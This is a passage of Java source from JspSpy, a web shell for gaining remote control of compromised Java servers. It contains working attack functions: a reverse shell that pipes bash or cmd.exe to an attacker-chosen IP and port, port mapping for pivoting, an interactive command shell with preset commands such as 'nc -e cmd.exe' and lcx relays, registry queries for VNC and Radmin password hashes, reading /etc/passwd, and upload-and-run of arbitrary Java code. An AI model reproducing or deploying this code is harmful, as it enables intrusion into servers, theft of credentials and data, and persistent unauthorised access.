2476String yourPort = request.getParameter("yourPort");
2477Socket yourS = new Socket();
2478yourS.connect(new InetSocketAddress(yourIP,Integer.parseInt(yourPort)));
2479Socket targetS = new Socket();
2480targetS.connect(new InetSocketAddress(targetIP,Integer.parseInt(targetPort)));
2481StreamConnector.readFromLocal(new DataInputStream(targetS.getInputStream()),new DataOutputStream(yourS.getOutputStream()));
2482StreamConnector.readFromRemote(targetS,yourS,new DataInputStream(yourS.getInputStream()),new DataOutputStream(targetS.getOutputStream()));
2483JSession.setAttribute("done","Port Back Success !");
2484((Invoker)ins.get("vmp")).invoke(request,response,JSession);
2485} catch (Exception e) {
2486
2487throw e ;
2488}
2489}
2490}
2491private static class MapPortInvoker extends DefaultInvoker {
2492public boolean doBefore(){return false;}
2493public boolean doAfter(){return false;}
2494public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2495try {
2496PrintWriter out = response.getWriter();
2497String localIP = request.getParameter("localIP");
2498String localPort = request.getParameter("localPort");
2499final String remoteIP = request.getParameter("remoteIP");
2500final String remotePort = request.getParameter("remotePort");
2501if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort))
2502return;
2503Object obj = JSession.getAttribute(PORT_MAP);
2504if (obj != null) {
2505ServerSocket s = (ServerSocket)obj;
2506s.close();
2507}
2508final ServerSocket server = new ServerSocket();
2509server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort)));
2510JSession.setAttribute(PORT_MAP,server);
2511new Thread(new Runnable(){
2512public void run(){
2513while (true) {
2514Socket soc = null;
2515Socket remoteSoc = null;
2516DataInputStream remoteIn = null;
2517DataOutputStream remoteOut = null;
2518DataInputStream localIn = null;
2519DataOutputStream localOut = null;
2520try{
2521soc = server.accept();
2522remoteSoc = new Socket();
2523remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort)));
2524remoteIn = new DataInputStream(remoteSoc.getInputStream());
2525remoteOut = new DataOutputStream(remoteSoc.getOutputStream());
2526localIn = new DataInputStream(soc.getInputStream());
2527localOut = new DataOutputStream(soc.getOutputStream());
2528StreamConnector.readFromLocal(localIn,remoteOut);
2529StreamConnector.readFromRemote(soc,remoteSoc,remoteIn,localOut);
2530}catch(Exception ex)
2531{
2532break;
2533}
2534}
2535}
2536
2537}).start();
2538JSession.setAttribute("done","Map Port Success!");
2539JSession.setAttribute("localIP",localIP);
2540JSession.setAttribute("localPort",localPort);
2541JSession.setAttribute("remoteIP",remoteIP);
2542JSession.setAttribute("remotePort",remotePort);
2543JSession.setAttribute(SESSION_O,"vmp");
2544response.sendRedirect(SHELL_NAME);
2545} catch (Exception e) {
2546
2547throw e ;
2548}
2549}
2550}
2551//VBackConnect
2552private static class VbcInvoker extends DefaultInvoker {
2553public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2554try {
2555PrintWriter out = response.getWriter();
2556Object ip = JSession.getAttribute("ip");
2557Object port = JSession.getAttribute("port");
2558Object program = JSession.getAttribute("program");
2559Object done = JSession.getAttribute("done");
2560JSession.removeAttribute("ip");
2561JSession.removeAttribute("port");
2562JSession.removeAttribute("program");
2563JSession.removeAttribute("done");
2564if (Util.isEmpty(ip))
2565ip = request.getRemoteAddr();
2566if (Util.isEmpty(port) || !Util.isInteger(port.toString()))
2567port = "53";
2568if (Util.isEmpty(program)) {
2569if (ISLINUX)
2570program = "/bin/bash";
2571else
2572program = "cmd.exe";
2573}
2574
2575if (!Util.isEmpty(done))
2576Util.outMsg(out,done.toString());
2577out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
2578"<input type=\"hidden\" name=\"o\" value=\"backConnect\">"+
2579" <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
2580" <tr>"+
2581" <td><h2 id=\"Bin_H2_Title\">Back Connect >></h2>"+
2582" <div id=\"hOWTm\">"+
2583" <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
2584" <tr align=\"center\">"+
2585" <td style=\"width:5%\"></td>"+
2586" <td align=\"center\">Your Ip :"+
2587" <input name=\"ip\" id=\"ip\" type=\"text\" class=\"input\" size=\"20\" value=\""+ip+"\" />"+
2588" Your Port :"+
2589" <input name=\"port\" id=\"port\" type=\"text\" class=\"input\" size=\"20\" value=\""+port+"\" />Program To Back :"+
2590" <input name=\"program\" id=\"program\" type=\"text\" value=\""+program+"\" class=\"input\" size=\"20\" value=\"d\" /></td>"+
2591" </tr>"+
2592" <tr align=\"center\">"+
2593" <td colspan=\"2\"><br/>"+
2594" <input type=\"submit\" name=\"FJE\" value=\"Connect\" id=\"FJE\" class=\"bt\" />"+
2595" </td>"+
2596" </tr>"+
2597" </table>"+
2598" </div>"+
2599"</td>"+
2600"</tr>"+
2601"</table>"+
2602"</form>");
2603} catch (Exception e) {
2604
2605throw e ;
2606}
2607}
2608}
2609private static class BackConnectInvoker extends DefaultInvoker {
2610public boolean doAfter(){return false;}
2611public boolean doBefore(){return false;}
2612public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2613try {
2614String ip = request.getParameter("ip");
2615String port = request.getParameter("port");
2616String program = request.getParameter("program");
2617if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port))
2618return;
2619Socket socket = new Socket(ip,Integer.parseInt(port));
2620Process process = Runtime.getRuntime().exec(program);
2621(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();
2622(new StreamConnector(process.getErrorStream(), socket.getOutputStream())).start();
2623(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
2624JSession.setAttribute("done","Back Connect Success!");
2625JSession.setAttribute("ip",ip);
2626JSession.setAttribute("port",port);
2627JSession.setAttribute("program",program);
2628JSession.setAttribute(SESSION_O,"vbc");
2629response.sendRedirect(SHELL_NAME);
2630} catch (Exception e) {
2631
2632throw e ;
2633}
2634}
2635}
2636private static class JspEnvInvoker extends DefaultInvoker {
2637public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2638try {
2639PrintWriter out = response.getWriter();
2640out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
2641" <tr>"+
2642" <td><h2 id=\"Ninty_H2_Title\">System Properties >></h2>"+
2643" <div id=\"ghaB\">"+
2644" <hr/>"+
2645" <ul id=\"Ninty_Ul_Sys\" class=\"info\">");
2646Properties pro = System.getProperties();
2647Enumeration names = pro.propertyNames();
2648while (names.hasMoreElements()){
2649String name = (String)names.nextElement();
2650out.println("<li><u>"+Util.htmlEncode(name)+" : </u>"+Util.htmlEncode(pro.getProperty(name))+"</li>");
2651}
2652out.println("</ul><h2 id=\"Ninty_H2_Mac\">System Environment >></h2><hr/><ul id=\"Ninty_Ul_Sys\" class=\"info\">");
2653/*
2654Map envs = System.getenv();
2655Set<Map.Entry<String,String>> entrySet = envs.entrySet();
2656for (Map.Entry<String,String> en:entrySet) {
2657out.println("<li><u>"+Util.htmlEncode(en.getKey())+" : </u>"+Util.htmlEncode(en.getValue())+"</li>");
2658}*/
2659out.println("</ul></div></td>"+
2660" </tr>"+
2661" </table>");
2662} catch (Exception e) {
2663
2664throw e ;
2665}
2666}
2667}
2668private static class ReflectInvoker extends DefaultInvoker {
2669public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2670try {
2671PrintWriter out = response.getWriter();
2672String c = request.getParameter("Class");
2673Class cls = null;
2674try {
2675if (!Util.isEmpty(c))
2676cls = Class.forName(c);
2677} catch (ClassNotFoundException ex) {
2678Util.outMsg(out,"<span style='color:red'>Class "+c+" Not Found ! </span>");
2679}
2680out.println("<form action=\""+SHELL_NAME+"\" id='refForm' method=\"post\">"+
2681" <input type=\"hidden\" name=\"o\" value=\"reflect\">"+
2682" <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
2683" <tr>"+
2684" <td><h2 id=\"Bin_H2_Title\">Java Reflect >></h2>"+
2685" <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
2686" <tr>"+
2687" <td>Class Name : <input name=\"Class\" type=\"text\" class=\"input\" value=\""+(Util.isEmpty(c) ? "java.lang.Object" : c)+"\" size=\"60\"/> "+
2688" <input type=\"submit\" class=\"bt\" value=\"Reflect\"/></td>"+
2689" </tr>"+
2690" "+
2691" </table>"+
2692" </td>"+
2693" </tr>"+
2694" </table>"+
2695"</form>");
2696
2697if (cls != null) {
2698StringBuffer sb = new StringBuffer();
2699if (cls.getPackage() != null)
2700sb.append("package "+cls.getPackage().getName()+";\n");
2701String n = null;
2702if (cls.isInterface())
2703n = "";
2704//else if (cls.isEnum())
2705// n = "enum";
2706else
2707n = "class";
2708sb.append(Modifier.toString(cls.getModifiers())+" "+n+" "+cls.getName()+"\n");
2709if (cls.getSuperclass() != null)
2710sb.append("\textends <a href=\"javascript:document.forms['refForm'].elements['Class'].value='"+cls.getSuperclass().getName()+"';document.forms['refForm'].submit()\" style='color:red;'>"+cls.getSuperclass().getName()+"</a>\n");
2711if (cls.getInterfaces() != null && cls.getInterfaces().length != 0) {
2712Class[] faces = cls.getInterfaces();
2713sb.append("\t implements ");
2714for (int i = 0;i<faces.length;i++) {
2715sb.append("<a href=\"javascript:document.forms['refForm'].elements['Class'].value='"+faces[i].getName()+"';document.forms['refForm'].submit()\" style='color:red'>"+faces[i].getName()+"</a>");
2716if (i != faces.length -1) {
2717sb.append(",");
2718}
2719}
2720}
2721sb.append("{\n\t\n");
2722sb.append("\t//constructors..\n");
2723Constructor[] cs = cls.getConstructors();
2724for (int i = 0;i<cs.length;i++) {
2725Constructor cc = cs[i];
2726sb.append("\t"+cc+";\n");
2727}
2728sb.append("\n\t//fields\n");
2729Field[] fs = cls.getDeclaredFields();
2730for (int i =0;i<fs.length;i++) {
2731Field f = fs[i];
2732sb.append("\t"+f.toString()+";");
2733if (Modifier.toString(f.getModifiers()).indexOf("static") != -1) {
2734sb.append("\t//value is : ");
2735f.setAccessible(true);
2736Object obj = f.get(null);
2737sb.append("<span style='color:red'>");
2738if (obj != null)
2739sb.append(obj.toString());
2740else
2741sb.append("NULL");
2742
2743sb.append("</span>");
2744}
2745sb.append("\n");
2746}
2747
2748sb.append("\n\t//methods\n");
2749Method[] ms = cls.getDeclaredMethods();
2750for (int i =0;i<ms.length;i++) {
2751Method m = ms[i];
2752sb.append("\t"+ m.toString()+";\n");
2753}
2754sb.append("}\n");
2755String m = "<span style='font-weight:normal'>"+Util.highLight(sb.toString()).replaceAll("\t"," ").replaceAll("\n","<br/>")+"</span>";
2756Util.outMsg(out,m,"left");
2757}
2758} catch (Exception e) {
2759throw e;
2760}
2761}
2762}
2763private static class TopInvoker extends DefaultInvoker {
2764public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2765try {
2766PrintWriter out = response.getWriter();
2767out.println("<form action=\""+SHELL_NAME+"\" method=\"post\" name=\"doForm\"></form>"+
2768"<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">"+
2769" <tr class=\"head\">"+
2770" <td><span style=\"float:right;\"><a href=\"http://www.forjj.com\" target=\"_blank\">JspSpy Ver: 2010 </a></span>"+request.getHeader("host")+" (<span id='ip'>"+InetAddress.getLocalHost().getHostAddress()+"</span>) | <a href=\"javascript:if (!window.clipboardData){alert('only support IE!');}else{void(window.clipboardData.setData('Text', document.getElementById('ip').innerText));alert('ok')}\">copy</a></td>"+
2771" </tr>"+
2772" <tr class=\"alt1\">"+
2773" <td><a href=\"javascript:doPost({o:'logout'});\">Logout</a> | "+
2774" <a href=\"javascript:doPost({o:'fileList'});\">File Manager</a> | "+
2775" <a href=\"javascript:doPost({o:'vConn'});\">DataBase Manager</a> | "+
2776" <a href=\"javascript:doPost({o:'vs'});\">Execute Command</a> | "+
2777" <a href=\"javascript:doPost({o:'vso'});\">Shell OnLine</a> | "+
2778" <a href=\"javascript:doPost({o:'vbc'});\">Back Connect</a> | "+
2779" <a href=\"javascript:doPost({o:'reflect'});\">Java Reflect</a> | "+
2780" <!--<a href=\"javascript:alert('not support yet');\">Http Proxy</a> | -->"+
2781" <a href=\"javascript:doPost({o:'ev'});\">Eval Java Code</a> | "+
2782" <a href=\"javascript:doPost({o:'vPortScan'});;\">Port Scan</a> | "+
2783" <a href=\"javascript:doPost({o:'vd'});\">Download Remote File</a> | "+
2784" <a href=\"javascript:;doPost({o:'clipboard'});\">ClipBoard</a> | "+
2785" <a href=\"javascript:doPost({o:'vmp'});\">Port Map</a> | "+
2786" <a href=\"javascript:doPost({o:'vother'});\">Others</a> | "+
2787" <a href=\"javascript:doPost({o:'jspEnv'});\">JSP Env</a> "+
2788" </tr>"+
2789"</table>");
2790if (JSession.getAttribute(MSG) != null) {
2791Util.outMsg(out,JSession.getAttribute(MSG).toString());
2792JSession.removeAttribute(MSG);
2793}
2794if (JSession.getAttribute(ENTER_MSG) != null) {
2795String outEntry = request.getParameter("outentry");
2796if (Util.isEmpty(outEntry) || !outEntry.equals("true"))
2797Util.outMsg(out,JSession.getAttribute(ENTER_MSG).toString());
2798}
2799} catch (Exception e) {
2800
2801throw e ;
2802}
2803}
2804}
2805private static class VOnLineShellInvoker extends DefaultInvoker {
2806public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2807try {
2808PrintWriter out = response.getWriter();
2809out.println("<script>"+
2810" function $(id) {"+
2811" return document.getElementById(id);"+
2812" }"+
2813" var ie = window.navigator.userAgent.toLowerCase().indexOf(\"msie\") != -1;"+
2814" window.onload = function(){"+
2815" setInterval(function(){"+
2816" if ($(\"autoscroll\").checked)"+
2817" {"+
2818" var f = window.frames[\"echo\"];"+
2819" if (f && f.document && f.document.body)"+
2820" {"+
2821" if (!ie)"+
2822" {"+
2823" if (f.document.body.offsetHeight)"+
2824" {"+
2825" f.scrollTo(0,parseInt(f.document.body.offsetHeight)+1);"+
2826" }"+
2827" } else {"+
2828" f.scrollTo(0,parseInt(f.document.body.scrollHeight)+1);"+
2829" }"+
2830" }"+
2831" }"+
2832" },500);"+
2833" }"+
2834" </script>");
2835out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
2836" <tr>"+
2837" <td>");
2838out.println("<h2>Shell OnLine »</h2><br/>");
2839out.println("<form action=\""+SHELL_NAME+"\" method=\"post\" target=\"echo\" onsubmit=\"$('cmd').focus()\">"+
2840" <input type=\"submit\" value=\" start \" class=\"bt\">"+
2841" <input type=\"text\" name=\"exe\" style=\"width:300px\" class=\"input\" value=\""+(ISLINUX ? "/bin/bash" :"c:\\windows\\system32\\cmd.exe")+"\"/>"+
2842" <input type=\"hidden\" name=\"o\" value=\"online\"/><input type=\"hidden\" name=\"type\" value=\"start\"/><span class=\"tip\">Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo</span>"+
2843" </form>"+
2844" <hr/>"+
2845" <iframe class=\"secho\" name=\"echo\" src=\"\">"+
2846" </iframe>"+
2847" <form action=\""+SHELL_NAME+"\" method=\"post\" onsubmit=\"this.submit();$('cmd').value='';return false;\" target=\"asyn\">"+
2848" <input type=\"text\" id=\"cmd\" name=\"cmd\" class=\"input\" style=\"width:75%\">"+
2849" <input name=\"o\" id=\"o\" type=\"hidden\" value=\"online\"/><input type=\"hidden\" id=\"ddtype\" name=\"type\" value=\"ecmd\"/>"+
2850" <select onchange=\"$('cmd').value = this.value;$('cmd').focus()\">"+
2851" <option value=\"\" selected> </option>"+
2852" <option value=\"uname -a\">uname -a</option>"+
2853" <option value=\"cat /etc/issue\">issue</option>"+
2854" <option value=\"cat /etc/passwd\">passwd</option>"+
2855" <option value=\"netstat -an\">netstat -an</option>"+
2856" <option value=\"net user\">net user</option>"+
2857" <option value=\"tasklist\">tasklist</option>"+
2858" <option value=\"tasklist /svc\">tasklist /svc</option>"+
2859" <option value=\"net start\">net start</option>"+
2860" <option value=\"net stop policyagent /yes\">net stop</option>"+
2861" <option value=\"nbtstat -A IP\">nbtstat -A</option>"+
2862" <option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v \"PortNumber\"'>reg query</option>"+
2863" <option value='reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters\\\" /v \"Parameter\"'>radmin hash</option>"+
2864" <option value='reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4\" /v \"password\"'>vnc hash</option>"+
2865" <option value=\"nc -e cmd.exe 192.168.230.1 4444\">nc</option>"+
2866" <option value=\"lcx -slave 192.168.230.1 4444 127.0.0.1 3389\">lcx</option>"+
2867" <option value=\"systeminfo\">systeminfo</option>"+
2868" <option value=\"net localgroup\">view groups</option>"+
2869" <option value=\"net localgroup administrators\">view admins</option>"+
2870" </select>"+
2871" <input type=\"checkbox\" checked=\"checked\" id=\"autoscroll\">Auto Scroll"+
2872" <input type=\"button\" value=\"Stop\" class=\"bt\" onclick=\"$('ddtype').value='stop';this.form.submit()\">"+
2873" </form>"+
2874" <iframe style=\"display:none\" name=\"asyn\"></iframe>"
2875);
2876out.println(" </td>"+
2877" </tr>"+
2878"</table>");
2879} catch (Exception e) {
2880throw e ;
2881}
2882}
2883}
2884private static class OnLineInvoker extends DefaultInvoker {
2885public boolean doBefore(){return false;}
2886public boolean doAfter(){return false;}
2887public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2888try {
2889String type = request.getParameter("type");
2890if (Util.isEmpty(type))
2891return;
2892if (type.toLowerCase().equals("start")) {
2893String exe = request.getParameter("exe");
2894if (Util.isEmpty(exe))
2895return;
2896Process pro = Runtime.getRuntime().exec(exe);
2897ByteArrayOutputStream outs = new ByteArrayOutputStream();
2898response.setContentLength(100000000);
2899response.setContentType("text/html;charset="+System.getProperty("file.encoding"));
2900OnLineProcess olp = new OnLineProcess(pro);
2901JSession.setAttribute(SHELL_ONLINE,olp);
2902new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start();
2903new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start();
2904new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();
2905Thread.sleep(1000 * 60 * 60 * 24);
2906} else if (type.equals("ecmd")) {
2907Object o = JSession.getAttribute(SHELL_ONLINE);
2908String cmd = request.getParameter("cmd");
2909if (Util.isEmpty(cmd))
2910return;
2911if (o == null)
2912return;
2913OnLineProcess olp = (OnLineProcess)o;
2914olp.setCmd(cmd);
2915} else {
2916Object o = JSession.getAttribute(SHELL_ONLINE);
2917if (o == null)
2918return;
2919OnLineProcess olp = (OnLineProcess)o;
2920olp.stop();
2921}
2922} catch (Exception e) {
2923
2924throw e;
2925}
2926}
2927}
2928private static class EnterInvoker extends DefaultInvoker {
2929public boolean doBefore(){return false;}
2930public boolean doAfter(){return false;}
2931public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2932PrintWriter out = response.getWriter();
2933String type = request.getParameter("type");
2934if (!Util.isEmpty(type)) {
2935JSession.removeAttribute(ENTER);
2936JSession.removeAttribute(ENTER_MSG);
2937JSession.removeAttribute(ENTER_CURRENT_DIR);
2938JSession.setAttribute(MSG,"Exit File Success ! ");
2939} else {
2940String f = request.getParameter("filepath");
2941if (Util.isEmpty(f))
2942return;
2943JSession.setAttribute(ENTER,f);
2944JSession.setAttribute(ENTER_MSG,"You Are In File <a style='color:red'>\""+f+"\"</a> Now ! <a href=\"javascript:doPost({o:'enter',type:'exit'})\"> Exit </a>");
2945}
2946response.sendRedirect(SHELL_NAME);
2947}
2948}
2949private static class VExport2FileInvoker extends DefaultInvoker {
2950public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2951PrintWriter out = response.getWriter();
2952String type = request.getParameter("type");
2953String sql = request.getParameter("sql");
2954String table = request.getParameter("table");
2955if (Util.isEmpty(sql) && Util.isEmpty(table)) {
2956JSession.setAttribute(SESSION_O,"vConn");
2957response.sendRedirect(SHELL_NAME);
2958return;
2959}
2960out.println("<form action=\"\" method=\"post\">"+
2961"<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
2962" <tr>"+
2963" <td>"+
2964" <input type=\"hidden\" name=\"o\" value=\"export\"/>"+
2965" <input type=\"hidden\" name=\"type\" value=\""+(Util.isEmpty(type) ? "" : type)+"\"/>"+
2966" <input type=\"hidden\" name=\"sql\" value=\""+(Util.isEmpty(sql) ? "" : sql.replaceAll("\"","""))+"\"/>"+
2967" <input type=\"hidden\" name=\"table\" value=\""+(Util.isEmpty(table) ? "" : table)+"\"/>"+
2968" <h2>Export To File »</h2>"+
2969" "+
2970" <hr/>Export \"<span style='color:red;font-weight:bold'>"+(Util.isEmpty(sql) ? table : sql.replaceAll("\"","""))+"</span>\" To File : <input type=\"text\" style=\"font-weight:bold\" name=\"filepath\" value=\""+(JSession.getAttribute(CURRENT_DIR).toString()+"/exportdata.txt")+"\" size=\"100\" class=\"input\"/>"+
2971" <select name='encode' class='input'><option value=''>ANSI</option><option value='GBK'>GBK</option><option value='UTF-8'>UTF-8</option><option value='ISO-8859-1'>ISO-8859-1</option></select>"+
2972" <input type=\"submit\" class=\"bt\" value=\"Export\"/><br/><br/>"+BACK_HREF+"</td>"+
2973" </tr>"+
2974" </table>"+
2975"</form>");
2976}
2977}
2978
2979private static class ExportInvoker extends DefaultInvoker {
2980public boolean doBefore(){return false;}
2981public boolean doAfter(){return false;}
2982public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2983String type = request.getParameter("type");
2984String filepath = request.getParameter("filepath");
2985String encode = request.getParameter("encode");
2986String sql = null;
2987DBOperator dbo = null;
2988dbo = (DBOperator)JSession.getAttribute(DBO);
2989
2990if (Util.isEmpty(type)) {
2991//table export
2992String tb = request.getParameter("table");
2993if (Util.isEmpty(tb))
2994return;
2995String s = dbo.getConn().getMetaData().getIdentifierQuoteString();
2996sql = "select * from "+s+tb+s;
2997
2998} else if (type.equals("queryexp")) {
2999//query export
3000sql = request.getParameter("sql");
3001if (Util.isEmpty(sql)) {
3002JSession.setAttribute(SESSION_O,"vConn");
3003response.sendRedirect(SHELL_NAME);
3004return;
3005}
3006}
3007Object o = dbo.execute(sql);
3008ByteArrayOutputStream bout = new ByteArrayOutputStream();
3009byte[] rowSep = "\r\n".getBytes();
3010if (o instanceof ResultSet) {
3011ResultSet rs = (ResultSet)o;
3012ResultSetMetaData meta = rs.getMetaData();
3013int count = meta.getColumnCount();
3014for (int i =1;i<=count;i++) {
3015String colName = meta.getColumnName(i)+"\t";
3016byte[] b = null;
3017if (Util.isEmpty(encode))
3018b = colName.getBytes();
3019else
3020b = colName.getBytes(encode);
3021bout.write(b,0,b.length);
3022}
3023bout.write(rowSep,0,rowSep.length);
3024while (rs.next()) {
3025for (int i =1;i<=count;i++) {
3026String v = null;
3027try {
3028v = rs.getString(i);
3029} catch (SQLException ex) {
3030v = "<<Error!>>";
3031}
3032v += "\t";
3033byte[] b = null;
3034if (Util.isEmpty(encode))
3035b = v.getBytes();
3036else
3037b = v.getBytes(encode);
3038bout.write(b,0,b.length);
3039}
3040bout.write(rowSep,0,rowSep.length);
3041}
3042rs.close();
3043ByteArrayInputStream input = new ByteArrayInputStream(bout.toByteArray());
3044BufferedOutputStream output = null;
3045if (!Util.isEmpty(filepath)) {
3046//export2file
3047output = new BufferedOutputStream(new FileOutputStream(new File(filepath)));
3048} else {
3049//download.
3050response.setHeader("Content-Disposition","attachment;filename=DataExport.txt");
3051output = new BufferedOutputStream(response.getOutputStream());
3052}
3053byte[] data = new byte[1024];
3054int len = input.read(data);
3055while (len != -1) {
3056output.write(data,0,len);
3057len = input.read(data);
3058}
3059bout.close();
3060input.close();
3061output.close();
3062if (!Util.isEmpty(filepath)) {
3063JSession.setAttribute(MSG,"Export To File Success !");
3064response.sendRedirect(SHELL_NAME);
3065}
3066}
3067}
3068}
3069private static class EvalInvoker extends DefaultInvoker {
3070public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
3071String type = request.getParameter("type");
3072PrintWriter out = response.getWriter();
3073Object msg = JSession.getAttribute(MSG);
3074if (msg != null) {
3075Util.outMsg(out,(String)msg);
3076JSession.removeAttribute(MSG);
3077}
3078if (Util.isEmpty(type)) {
3079out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
3080" <tr>"+
3081" <td><h2>Eval Java Code »</h2>"+
3082"<hr/>"+
3083" <p>"+
3084" <form action=\""+SHELL_NAME+"?o=eu\" method=\"post\" enctype=\"multipart/form-data\">"+
3085"UpLoad a Class File : ");
3086Util.outMsg(out,"<pre>"+
3087"<span style='color:blue'>public class</span> SpyEval{\r\n"+
3088" <span style='color:blue'>static</span> {\r\n"+
3089" <span style='color:green'>//Your Code Here.</span>\r\n"+
3090" }\r\n"+
3091"}\r\n"+
3092"</pre>","left");
3093out.println(" <input class=\"input\" name=\"file\" type=\"file\"/> <input type=\"submit\" class=\"bt\" value=\" Eval \"></form><hr/>"+
3094" <form action=\""+SHELL_NAME+"\" method=\"post\"><p></p>Jsp Eval : <br/>"+
3095" <input type=\"hidden\" name=\"o\" value=\"ev\"><input type=\"hidden\" name=\"type\" value=\"jsp\">"+
3096" <textarea name=\"jspc\" rows=\"15\" cols=\"70\">"+URLDecoder.decode("%3C%25%40page+pageEncoding%3D%22utf-8%22%25%3E%0D%0A%3C%25%0D%0A%2F%2Fyour+code+here.%0D%0Aout.println%28%22create+a+jsp+file+then+include+it+%21+by++ninty%22%29%3B%0D%0A%25%3E","utf-8")+"</textarea>"+
3097" <br/><input class=\"bt\" name=\"button\" id=\"button\" value=\"Eval\" type=\"submit\" size=\"100\" />"+
3098" </form>"+
3099" </p>"+
3100" </td>"+
3101" </tr>"+
3102"</table>");
3103} else if (type.equals("jsp")){
3104String jspc = request.getParameter("jspc");
3105if (Util.isEmpty(jspc))
3106return;
3107File f = new File(SHELL_DIR,"evaltmpninty.jsp");
3108BufferedWriter writer = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f),"utf-8"));
3109writer.write(jspc,0,jspc.length());
3110writer.flush();
3111writer.close();
3112out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
3113" <tr>"+
3114" <td><h2>Jsp Eval Result »</h2>");
3115out.println("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:left;font-weight:bold;margin:10px\">");
3116request.getRequestDispatcher("evaltmpninty.jsp").include(request,response);
3117out.println("</div><input type=\"button\" value=\" Back \" class=\"bt\" onclick=\"history.back()\"></td></tr></table> ");
3118f.delete();
3119}
3120}
3121}
3122private static class EvalUploadInvoker extends DefaultInvoker {
3123public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
3124ByteArrayOutputStream stream = new ByteArrayOutputStream();
3125UploadBean upload = new UploadBean();
3126upload.setTargetOutput(stream);
3127upload.parseRequest(request);
3128
3129if (stream.toByteArray().length == 2) {
3130JSession.setAttribute(MSG,"Please Upload Your Class File ! ");
3131((Invoker)ins.get("ev")).invoke(request,response,JSession);
3132return;
3133}
3134SpyClassLoader loader = new SpyClassLoader();
3135try {
3136Class c = loader.defineClass(null,stream.toByteArray());
3137c.newInstance();
3138}catch(Exception e) {
3139}
3140stream.close();
3141JSession.setAttribute(MSG,"Eval Java Class Done ! ");
3142((Invoker)ins.get("ev")).invoke(request,response,JSession);
3143}
3144}
3145private static class VOtherInvoker extends DefaultInvoker {
3146public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
3147try {
3148PrintWriter out = response.getWriter();
3149Object msg = JSession.getAttribute(MSG);
3150if (msg != null) {
3151Util.outMsg(out,(String)msg);
3152JSession.removeAttribute(MSG);
3153}
3154out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
3155" <tr>"+
3156" <td><h2 id=\"Bin_H2_Title\">Session Manager>></h2><hr/>"+
3157" <div id=\"hOWTm\" style=\"line-height:30px\">"+
3158" <ul>");
3159Enumeration en = JSession.getAttributeNames();
3160while (en.hasMoreElements()) {
3161Object o = en.nextElement();
3162if (o.toString().equals(MSG))
3163continue;
3164out.println("<li><form action='"+SHELL_NAME+"' method='post'><u>"+o.toString()+"</u> <input type=\"text\" name=\"value\" class=\"input\" size=\"50\" value=\""+JSession.getAttribute(o.toString())+"\">");
3165out.println("<input type='button' class='bt' value='Update' onclick=\"this.form.elements['type'].value='update';this.form.submit()\"> <input type='button' onclick=\"this.form.elements['type'].value='delete';this.form.submit()\" class='bt' value='Delete'/>");
3166out.println("<input type='hidden' name='o' value='sm'/><input type='hidden' name='type'/>");
3167out.println("<input type='hidden' name='name' value='"+o.toString()+"'/>");
3168out.println("</form></li>");
3169}
3170out.println("<li style='list-style:none'><form action='"+SHELL_NAME+"' method='post'><fieldset>"+
3171"<legend>New Session Attribute</legend>"+
3172"name : <input type=\"text\" name=\"name\" value=\"\" class=\"input\"> value : <input type=\"text\""+
3173" name=\"value\" class=\"input\"/> <input type='submit' value='Add' class='bt'><input type='hidden' name='o' value='sm'/><input type='hidden' name='type' value='update'>"+
3174" </fieldset></form></li></ul></div></td>"+
3175" </tr>"+
3176" </table>");
3177} catch (Exception e) {
3178throw e ;
3179}
3180}
3181}
3182//Session Manager
3183private static class SmInvoker extends DefaultInvoker {
